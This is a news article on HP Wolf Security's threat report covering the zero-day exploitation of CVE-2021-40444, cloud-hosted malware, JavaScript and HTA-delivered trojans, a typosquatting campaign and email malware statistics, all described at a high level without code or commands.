Cybercriminals exploiting zero-day vulnerability before enterprises can patch

News Desk -

Share

HP Inc. has issued its latest global HP Wolf Security Threat Insights Report, which examines real-world cyberattacks. The threat research team at HP Wolf Security discovered evidence that cybercriminals are immediately mobilising to weaponize new zero-day vulnerabilities.

HP discovered exploits of the zero-day CVE-2021-40444 – a remote code execution vulnerability that allows for the exploitation of the MSHTML browser engine utilising Microsoft Office documents – a week before the fix was released on September 14.

HP Wolf Security provides a unique view into the latest cybercriminal techniques by isolating threats that have eluded detection tools and made it to user endpoints. The HP threat research team discovered scripts meant to automate the creation of this attack on GitHub on September 10 — just three days after the initial danger alert. The exploit, if not patched, allows attackers to compromise endpoints with minimal user engagement. It makes use of a malicious archive file that spreads malware through an Office document. Users do not need to open the file or enable any macros; simply viewing it in File Explorer’s preview window is enough to start the attack, which most users are unaware of. Attackers can install backdoors into systems once the device has been compromised, which can then be sold to ransomware gangs.

Other notable threats isolated by the HP Wolf Security threat insight team include:

  • Rise in cybercriminals using legitimate Cloud and web providers to host malware: To elude intrusion detection systems and pass whitelisting tests, a recent GuLoader campaign hosted the Remcos Remote Access Trojan (RAT) on popular sites like OneDrive. Multiple malware families were also detected on gaming social media platforms such as Discord, according to HP Wolf Security.
  • JavaScript malware slipping past detection tools:  Various JavaScript RATs were transmitted via malicious email attachments as part of a campaign. The detection rate of JavaScript downloaders is lower than that of Office downloaders or binaries. Assailants are increasingly using RATs to steal credentials for business accounts or cryptocurrency wallets.
  • Targeted campaign found posing as the Ugandan National Social Security fund: To lead consumers to a site that downloads a malicious Word document, attackers employed “typosquatting,” which involves using a forged web address that looks identical to an authentic domain name. This employs macros to execute a PowerShell script that disables security logging and circumvents the Windows Antimalware Scan Interface.
  • Switching to HTA files spreads malware in a single click: The Trickbot Trojan is now being distributed through HTA (HTML application) files, which automatically deploy the malware when the attachment or archive file containing it is opened. Malicious HTA files are less likely to be detected by detection technologies because they are an unusual file type.

“The average time for a business to apply, test and fully deploy patches with the proper checks is 97 days, giving cybercriminals an opportunity to exploit this window of vulnerability’. While only highly capable hackers could exploit this vulnerability at first, automated scripts have lowered the bar for entry, making this type of attack accessible to less­ knowledgeable and resourced threat actors. This increases the risk to businesses substantially, as zero-day exploits are commoditized and made available to the mass market in venues like underground forums,” explains Alex Holland, Senior Malware Analyst, HP Wolf Security threat research team, HP Inc.

He added, “Such novel exploits tend to be effective at evading detection tools because signatures may be imperfect and become obsolete quickly as the understanding of the scope of an exploit changes. We expect threat actors to adopt CVE-2021-40444 as part of their arsenals, and potentially even replace common exploits used to gain initial access to systems today, such as those exploiting Equation Editor.”

“We are also seeing major platforms like OneDrive allowing hackers to conduct ‘flash in the pan’ attacks. While malware hosted on such platforms are generally taken down quickly, this does not deter attackers because they can often achieve their objective of delivering malware in the few hours the links are live,” Holland continues.

Further noted, “Some threat actors are changing the script or file type they are using every few months. Malicious JavaScript and HTA files are nothing new, but they are still landing in employee inboxes, putting the enterprise at risk.One campaign deployed Vengeance Justice Worm, which can spread to other systems and USB drives.”

The conclusions are based on data from millions of HP Wolf Security endpoints. HP Wolf Security tracks malware by isolating and capturing the whole infection chain in isolated micro virtual Machines (micro VMs), assisting in the mitigation of threats that have snuck past other security technologies. Customers have been able to access over 10 billion email attachments, online pages, and downloads without experiencing any security breaches as a result of this. HP Wolf Security researchers and engineers can improve endpoint security protection and overall system resilience by better understanding the behaviour of malware in the wild.

Key findings in the report include:

• At least one gateway scanner has been circumvented by 12 percent of the email malware discovered.

• Email was responsible for 89 percent of malware found, with web downloads accounting for 11% and other vectors such as removable storage devices accounting for less than 1%.

• Archive files (38 percent, up from 17.26 percent last quarter), Word documents (23 percent), spreadsheets (17 percent), and executable files were the most popular attachments used to distribute malware (16 percent )

• The top five most prevalent phishing lures were “order,” “payment,” “new,” “quotation,” and “request,” all of which were related to business activities.

• According to the research, 13% of malware captured was previously unknown.

 “We can’t keep relying on detection alone. The threat landscape is too dynamic and, as we can see from the analysis of threats captured in our VMs, attackers are increasingly adept at evading detection,”comments Dr. Ian Pratt, Global Head of Security for Personal Systems, HP Inc.

Also said, “Organizations must take a layered approach to endpoint security, following zero trust principles to contain and isolate the most common attack vectors like email, browsers, and downloads. This will eliminate the attack surface for whole classes of threats, while giving organizations the breathing room needed to coordinate patch cycles securely without disrupting services.”